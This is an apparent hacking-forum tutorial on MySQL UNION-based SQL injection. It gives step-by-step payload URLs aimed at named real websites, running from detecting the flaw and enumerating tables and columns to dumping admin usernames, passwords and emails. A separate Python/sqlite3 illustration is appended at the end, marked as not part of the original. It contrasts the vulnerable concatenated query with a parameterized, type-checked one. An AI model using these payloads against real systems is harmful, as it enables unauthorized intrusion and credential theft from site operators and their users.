I have not included a tutorial for versions lower than 4 or for blind injection, because according to me more than 80% of SQL injections work this way :biggrin:
1. USE DORKS TO FIND SITES
http://f47al3rr0r.net/forum/showthread.php?tid=10
Credits : Biohazard
2. CHECK WHETHER THE SITE IS VULNERABLE
Put a ' at the end of the page URL (after the parameter value).
If the page does not reload in its original form, it is vulnerable.
e.g.
Nothing is shown on the page, so it might be vulnerable.
P.S:
If you get an error like one of these, it is not a MySQL injection, it's MSSQL:
/ Microsoft Access ODBC driver /
/ Open quotation /
/ Microsoft Amos DB provider for Oracle /
/ Division by zero in /
So find a good MSSQL tutorial.
3. FINDING THE NUMBER OF COLUMNS IN THE QUERY
Quote:http://www.pseb.org.pk/page.php?nid=11 ORDER BY 1-- NO ERROR
http://www.pseb.org.pk/page.php?nid=11 ORDER BY 10-- ERROR
SO THE COLUMN NUMBER IS BETWEEN 1 AND 10
http://www.pseb.org.pk/page.php?nid=11 ORDER BY 5-- ERROR
SO THE COLUMN NUMBER IS BETWEEN 1 AND 5
http://www.pseb.org.pk/page.php?nid=11 ORDER BY 4-- NO ERROR
SO THE NUMBER OF COLUMNS IS 4
4. CHECK IF THE UNION STATEMENT IS WORKING AND FIND THE VULNERABLE COLUMNS
Quote:http://www.pseb.org.pk/page.php?nid=-11 UNION ALL SELECT 1,2,3,4--
Watch out for the minus sign I placed before the page number.
We do it so the website only returns the header (no matching row of its own) and the injected values become visible.
See the numbers it is showing on the page.
Those are the injectable column numbers.
5. CHECK THE DATABASE VERSION
http://www.pseb.org.pk/page.php?nid=-11 UNION ALL SELECT @@version,2,3,4--
VERSION 5.0.83, cheers
6. FINDING TABLE NAMES
This sub-section is divided into two parts:
6A. WHEN ALL TABLE NAMES ARE SHOWN AT ONCE
Quote:http://www.pseb.org.pk/page.php?nid=-11 UNION ALL SELECT table_name,2,3,4 from information_schema.tables--
In this case we will see which tables are interesting.
tblUsers intrigues me in this case :hehe:
6B. WHEN ONLY ONE TABLE NAME IS SHOWN, AND IT IS SOMETHING LIKE CHARACTER_SETS
Here we use LIMIT statements.
Example:
Check this
http://www.medicalmarijuanainformation.c...roupID=-13 union select all table_name from information_schema.tables--
You will get the same problem here which I mentioned above (only one table name is displayed).
So your way forward will be
http://www.medicalmarijuanainformation.c...roupID=-13 union all select table_name from information_schema.tables limit 0,1--
then
http://www.medicalmarijuanainformation.c...roupID=-13 union all select table_name from information_schema.tables limit 1,1--
then
http://www.medicalmarijuanainformation.c...roupID=-13 union all select table_name from information_schema.tables limit 2,1--
till
http://www.medicalmarijuanainformation.c...roupID=-13 union all select table_name from information_schema.tables limit 17,1--
Use the magic quotes trick (see 7A) together with LIMIT to find the column names.
7. FIND COLUMNS IN THE DATABASE
This sub-section has been divided into 2 parts:
7A. FINDING COLUMNS IN A PARTICULAR TABLE
http://www.medicalmarijuanainformation.c...roupID=-13 union all select column_name from information_schema.columns where table_name='adminusers' limit 0,1--
Here only one column name is displayed, so I am using a LIMIT statement; otherwise it would be unnecessary.
This only works if MAGIC QUOTES is off.
The single quotes I placed around the table name are important.
If it doesn't work, try hexing the table name.
Google for a hex converter, put the table name in there and get its hex.
7B. FINDING ALL COLUMN NAMES
Quote:http://www.pseb.org.pk/page.php?nid=-11 UNION ALL SELECT COLUMN_NAME,2,3,4 from information_schema.COLUMNS--
If only one column name is displayed, then use the LIMIT statement as shown above.
8. DISPLAYING USER NAMES AND PASSWORDS
0x3a is the hex form of ":" and is used as a separator in the output.
http://www.medicalmarijuanainformation.c...roupID=-13 union all select group_concat(adminID,0x3a,adminUsername,0x3a,adminPassword) from adminusers --
Quote:http://www.pseb.org.pk/page.php?nid=-11 union all select concat(user_id,0x3a,password,0x3a,email),2,3,4 from tblUsers --
Cracking the hash, finding the hash type, finding the admin page etc. are out of scope of this tutorial.
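As an added illustration that is not part of the original tutorial, here is a small Python/sqlite3 model of the page.php?nid= lookup from steps 2 and 4: the string-concatenated query the tutorial relies on next to the parameterized version that stops both the ' probe and the -11 UNION ALL SELECT trick. The schema, the tblUsers rows and the placeholder password value are constructed for the example.

```python
import sqlite3


def make_db():
    """Constructed sample schema modelled on the tutorial's page.php?nid= lookup."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE page(nid INTEGER, title TEXT, body TEXT);
        INSERT INTO page VALUES (11, 'Home', 'Welcome');
        CREATE TABLE tblUsers(user_id INTEGER, password TEXT, email TEXT);
        INSERT INTO tblUsers VALUES (1, 'hash-placeholder', 'admin@example.com');
    """)
    return conn


def vulnerable_lookup(conn, nid):
    """The pattern the tutorial exploits: the request parameter is pasted into the SQL text."""
    sql = "SELECT title, body, nid FROM page WHERE nid=" + nid
    return conn.execute(sql).fetchall()


def safe_lookup(conn, nid):
    """Hardened form: validate the type, then bind the value so it is never parsed as SQL."""
    try:
        nid_int = int(nid)
    except ValueError:
        return []  # anything that is not a plain integer is rejected, not executed
    return conn.execute(
        "SELECT title, body, nid FROM page WHERE nid=?", (nid_int,)
    ).fetchall()


def quote_probe_breaks(conn, lookup):
    """Step 2 of the tutorial: does a stray quote change how the query is parsed?"""
    try:
        lookup(conn, "11'")
        return False
    except sqlite3.OperationalError:  # vulnerable: the quote reached the SQL parser
        return True


# Step 4 of the tutorial, with a -11 so the original row returns nothing
UNION_INPUT = "-11 UNION ALL SELECT user_id, password, email FROM tblUsers--"
```

Against vulnerable_lookup the UNION_INPUT returns the tblUsers row in place of the page; against safe_lookup it returns nothing, and the ' probe produces no database error at all.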